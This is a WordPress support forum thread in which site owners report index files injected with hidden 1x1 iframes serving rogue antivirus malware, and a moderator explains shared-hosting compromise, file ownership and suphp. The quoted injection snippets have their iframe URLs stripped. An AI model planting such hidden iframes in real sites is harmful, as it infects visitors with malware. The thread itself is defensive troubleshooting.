Support » Fixing WordPress » Malware Installed on WP sites

  • I run several WP sites varying from v2.2.1 to v2.6. All have been attacked/hacked with the intent of downloading malware to the user’s computer. This started on the 17th Oct. I fixed it and they were again attacked on the 18th.

    They seem to get in at will, not only WP, but html index pages seem to be no problem. The objective is to download XP AntiSpyware 2009, a variation on the AntiSpyware XP 2008 rogue a couple of months ago.

    This is how index.php is changed, I have bolded the added code:

    /* Short and sweet */
    define(‘WP_USE_THEMES’, true);
    ?<html><body><iframe src=”” width=1 height=1 style=”visibility: hidden”></iframe><iframe src=”” width=1 height=1 style=”visibility: hidden”></iframe></body></html>>

    The permissions on this were set to 644; owner read/write, others read only. How can I stop this happening because although I have the tools to remove this trojan visitors to my sites may not.

Viewing 7 replies - 1 through 7 (of 7 total)
  • You should contact your host immediately as all shared servers are probably experiencing this. I would guess they are getting in somewhere in the server (an unsecure site).
    Check your server logs, also.



    This is not a WordPress issue only.

    I had this happen on sites that are not WP-powered too. And on four different servers, on absolutely all the sites I run – whether it’s for work or for personal pleasure, whether I’m the owner of the site or I just set it up for someone else.

    As it is fairly impossible that some random Chinese spammer knows that the same person is running all those sites, I assume something’s getting through exploit holes in the system itself, gacking the computer owner’s FTP passwod (I think?) and they’re adding

    <html><body><iframe src="" width=1 height=1 style="visibility: hidden"></iframe></body></html>

    …or whatever else to EACH SINGLE index.php, index.htm, index.html they find. And this is enormous pain, as they e.g. find each single index on the server; the most BBS scripts have those in all folders. 🙁

    I had this happen last Friday while my computer was on and I was away; I installed all Windows updates. However, it happened again tonight and, yet again, it affected sites on four servers, hosted by four different hosting companies. This is insane. I don’t even know whom to ask about it anymore. Would not storing my FTP passwords in my FTP client help? How can they get in when the computer is off?



    Oh, and just to add: last week, my friend’s website on my server was the only one spared. This time, when I had its FTP info in my FTP client, it got hacked too. That’s why I think it has nothing to do with servers themselves.

    Samuel B


    That’s why I think it has nothing to do with servers themselves.

    Exactly! and that’s why you should be on your host’s butt about this.

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    …or whatever else to EACH SINGLE index.php, index.htm, index.html they find.

    This is an almost certain indication that they hacked into one of the sites on the shared server and then proceeded to run a script which searched the system and simply added that code to every index file it found that was writable.

    Your files should NOT be writable by the webserver user. That’s your fundamental problem here. On a shared host, when somebody gets in via one door, then they can access all the sites on that host. So you not only need to secure the host itself, but also each site needs to secure itself in case one of the other sites gets hacked.

    This is the most common way for a site to get hacked, actually. I like to use suphp to work around this sort of thing and get the best of both worlds (suphp runs the php process as the owner of the php file, thus limiting damage to that site only), but different people disagree.



    >Your files should NOT be writable by the webserver user.

    With all due respect, most major web hosting companies like LunarP and HMonster don’t allow shared server users to set the CHMOD to lower than 644 or 600. I don’t know for small ones, though.

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    644 should be safe as long as the files are owned by the user himself, and not by the webserver user.

    My files look like this:

    drwxr-xr-x 2 otto group   4096 2008-10-15 10:07 directory
    -rw-r--r-- 1 otto group 123456 2008-10-23 10:12 file.php

    The webserver runs as apache/apache. It can’t write to my files.

    No, this is a bit of a problem, since automatic upgrades and such won’t work properly. So, I run suphp, which makes the php processes run as me, otto. So now the webserver can write to my files. But, and this is important, it can’t write to anybody else’s files on the machine. So an attack on one of my sites is limited to that site and that site only.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Malware Installed on WP sites’ is closed to new replies.